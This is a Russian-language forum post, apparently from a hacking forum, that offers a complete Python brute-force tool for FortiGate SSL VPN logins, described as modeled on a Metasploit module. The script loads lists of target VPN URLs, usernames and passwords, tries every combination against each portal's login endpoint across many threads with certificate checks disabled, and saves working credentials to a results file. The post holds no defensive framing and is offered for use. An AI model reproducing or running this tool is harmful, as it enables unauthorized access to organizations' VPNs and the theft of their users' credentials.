- Регистрация
- 3 Фев 2025
- Сообщения
- 67
- Реакции
- 13
Вы должны быть зарегистрированы для просмотра вложений
Форти-скрипт для брут-атаки VPN, разработанный по аналогии с модулем msf
Python:
import argparse
import requests
import threading
import queue
import time
import datetime
import sys
import logging
import signal
from urllib.parse import urlparse
import concurrent.futures
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from colorama import init, Fore, Style
init()
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
shutdown_event = threading.Event()
def handle_signal(signum, frame):
print(f"{Fore.RED}\n[!] Ctrl+C detected, shutting down...{Style.RESET_ALL}")
shutdown_event.set()
signal.signal(signal.SIGINT, handle_signal)
class FortiBrutes:
def __init__(self, targets_file, users_file, passwords_file, timeout, threads):
self.timestamp = datetime.datetime.now().strftime('%Y%m%d-%H%M%S')
self.targets = self.load_datas(targets_file)
self.users = self.load_datas(users_file)
self.passwords = self.load_datas(passwords_file)
self.target_queue = queue.Queue()
for target in self.targets:
self.target_queue.put(target)
self.results = queue.Queue()
self.lock = threading.Lock()
self.output_file = f"{self.timestamp}-results.txt"
self.error_file = f"{self.timestamp}-errors.log"
self.max_concurrent_targets = 5
logging.basicConfig(
filename=self.error_file,
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
self.timeout = timeout
self.threads = threads
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Content-Type': 'application/x-www-form-urlencoded'
})
self.success_count = 0
self.attempt_count = 0
self.skipped_targets = set()
self.successful_targets = set()
self.semaphore = threading.BoundedSemaphore(self.max_concurrent_targets)
def load_datas(self, filename):
try:
with open(filename, 'r', encoding='utf-8') as f:
lines = [line.strip() for line in f if line.strip()]
if not lines:
raise ValueError("File is empty")
return lines
except Exception as e:
error_msg = f"Error loading file {filename}: {str(e)}"
print(f"{Fore.RED}[!] {error_msg}{Style.RESET_ALL}")
logging.error(error_msg)
sys.exit(1)
def strip_forti(self, target):
target = target.strip()
if not target.startswith(('http://', 'https://')):
target = 'https://' + target
return target.rstrip('/')
def parse_targets(self, target):
parsed = urlparse(self.strip_forti(target))
return parsed.netloc or parsed.path.split('/')[0]
def test_him(self, target):
if shutdown_event.is_set():
return False
target_display = self.parse_targets(target)
try:
url = self.strip_forti(target)
response = self.session.get(url, timeout=self.timeout, verify=False)
if response.status_code in (200, 301, 302):
print(f"{Fore.GREEN}[+] Server is responsive on target:'{target_display}'{Style.RESET_ALL}")
return True
return False
except requests.RequestException as e:
error_msg = f"Connection failed for {target}: {str(e)}"
print(f"{Fore.RED}[!] Error: Target {target_display}{Style.RESET_ALL}")
logging.error(error_msg)
return False
def test_forti(self, target, username, password):
if shutdown_event.is_set() or target in self.successful_targets or target in self.skipped_targets:
return False, "Shutdown, success, or skip detected"
target_display = self.parse_targets(target)
url = f"{self.strip_forti(target)}check"
post_params = {
'ajax': '1',
'username': username,
'credential': password,
'realm': ''
}
try:
response = self.session.post(
url,
data=post_params,
timeout=self.timeout,
verify=False,
allow_redirects=True
)
with self.lock:
self.attempt_count += 1
if (response.status_code == 200 and
'redir=' in response.text and '&portal=' in response.text):
return True, response.text[:100]
return False, f"FAILED LOGIN - '{username}':'{password}' on target:'{target_display}'"
except (requests.ConnectionError, requests.Timeout, requests.RequestException) as e:
error_msg = f"Target {target} skipped due to connection issue: {str(e)}"
print(f"{Fore.RED}[!] Error: Target {target_display}{Style.RESET_ALL}")
logging.info(error_msg)
with self.lock:
self.skipped_targets.add(target)
return False, error_msg
except Exception as e:
error_msg = f"Unexpected error for {target} (user: {username}, pass: {password}): {str(e)}"
print(f"{Fore.RED}[!] Error: Target {target_display}{Style.RESET_ALL}")
logging.error(error_msg)
return False, f"FAILED LOGIN - '{username}':'{password}' on target:'{target_display}'"
def forti_worker(self, target, credentials):
username, password = credentials
if shutdown_event.is_set() or target in self.skipped_targets or target in self.successful_targets:
return
target_display = self.parse_targets(target)
print(f"{Fore.YELLOW}[*] Trying username:'{username}' with password:'{password}' on target:'{target_display}'{Style.RESET_ALL}")
success, message = self.test_forti(target, username, password)
if success:
with self.lock:
if target not in self.successful_targets:
self.success_count += 1
result = {'url': target, 'username': username, 'password': password}
print(f"{Fore.GREEN}[+] SUCCESSFUL LOGIN - '{username}':'{password}' on target:'{target_display}'{Style.RESET_ALL}")
self.results.put(result)
self.save_goods(result)
self.successful_targets.add(target)
elif "FAILED LOGIN" not in message:
print(f"{Fore.RED}[!] Error: Target {target_display}{Style.RESET_ALL}")
logging.info(message)
else:
print(f"{Fore.RED}[!] {message}{Style.RESET_ALL}")
def worker(self):
while not shutdown_event.is_set() and not self.target_queue.empty():
try:
target = self.target_queue.get_nowait()
except queue.Empty:
break
self.semaphore.acquire()
try:
if shutdown_event.is_set() or target in self.skipped_targets or target in self.successful_targets:
continue
if not self.test_him(target):
with self.lock:
self.skipped_targets.add(target)
continue
credentials = [(u, p) for u in self.users for p in self.passwords]
with concurrent.futures.ThreadPoolExecutor(max_workers=self.threads) as executor:
futures = [
executor.submit(self.forti_worker, target, cred)
for cred in credentials
]
try:
concurrent.futures.wait(futures, timeout=self.timeout * len(credentials))
for future in futures:
future.result()
except concurrent.futures.TimeoutError:
target_display = self.parse_targets(target)
error_msg = f"Login attempts timeout for {target}"
print(f"{Fore.RED}[!] Error: Target {target_display}{Style.RESET_ALL}")
logging.error(error_msg)
executor.shutdown(wait=False)
with self.lock:
self.skipped_targets.add(target)
except Exception as e:
target_display = self.parse_targets(target)
error_msg = f"Login executor error for {target}: {str(e)}"
print(f"{Fore.RED}[!] Error: Target {target_display}{Style.RESET_ALL}")
logging.error(error_msg)
executor.shutdown(wait=False)
finally:
self.semaphore.release()
self.target_queue.task_done()
def save_goods(self, result):
try:
with open(self.output_file, 'a', encoding='utf-8') as f:
entry = (
"-----------------------------\n"
f"Url: {result['url']}\n"
f"Username: {result['username']}\n"
f"Password: {result['password']}\n"
"-----------------------------\n"
)
f.write(entry)
except Exception as e:
target_display = self.parse_targets(result['url'])
error_msg = f"Error saving result to {self.output_file}: {str(e)}"
print(f"{Fore.RED}[!] Error: Target {target_display}{Style.RESET_ALL}")
logging.error(error_msg)
def run(self):
print(f"{Fore.WHITE}[*] Starting login brute force...{Style.RESET_ALL}")
start_time = time.time()
with concurrent.futures.ThreadPoolExecutor(max_workers=self.max_concurrent_targets) as executor:
futures = [executor.submit(self.worker) for _ in range(self.max_concurrent_targets)]
try:
while not shutdown_event.is_set() and any(not f.done() for f in futures):
concurrent.futures.wait(futures, timeout=1.0)
if shutdown_event.is_set():
executor.shutdown(wait=False)
except Exception as e:
error_msg = f"Target executor error: {str(e)}"
print(f"{Fore.RED}[!] {error_msg}{Style.RESET_ALL}")
logging.error(error_msg)
executor.shutdown(wait=False)
while not self.results.empty() and not shutdown_event.is_set():
try:
self.results.get_nowait()
except queue.Empty:
break
end_time = time.time()
print(f"{Fore.WHITE}[*] Completed in {end_time - start_time:.2f} seconds{Style.RESET_ALL}")
print(f"{Fore.WHITE}[*] Errors logged to: {self.error_file}{Style.RESET_ALL}")
if self.success_count > 0:
print(f"{Fore.WHITE}[*] Results saved to: {self.output_file}{Style.RESET_ALL}")
else:
print(f"{Fore.WHITE}[*] No successful logins found{Style.RESET_ALL}")
def main():
parser = argparse.ArgumentParser(description='FortiGate VPN Brute Forcer')
parser.add_argument('--list', required=True, help='File containing target VPN URLs')
parser.add_argument('--users', required=True, help='File containing usernames')
parser.add_argument('--passwords', required=True, help='File containing passwords')
parser.add_argument('--timeout', type=int, default=5, help='(1-20, default: 5)')
parser.add_argument('--threads', type=int, default=10, help='(1-50, default: 10)')
args = parser.parse_args()
timeout = max(1, min(20, args.timeout))
threads = max(1, min(50, args.threads))
brute_forcer = FortiBrutes(args.list, args.users, args.passwords, timeout, threads)
brute_forcer.run()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(f"{Fore.RED}\n[!] Interrupted by user{Style.RESET_ALL}")
shutdown_event.set()
sys.exit(0)
except Exception as e:
error_msg = f"Fatal error: {str(e)}"
print(f"{Fore.RED}\n[!] {error_msg}{Style.RESET_ALL}")
logging.error(error_msg)
sys.exit(1)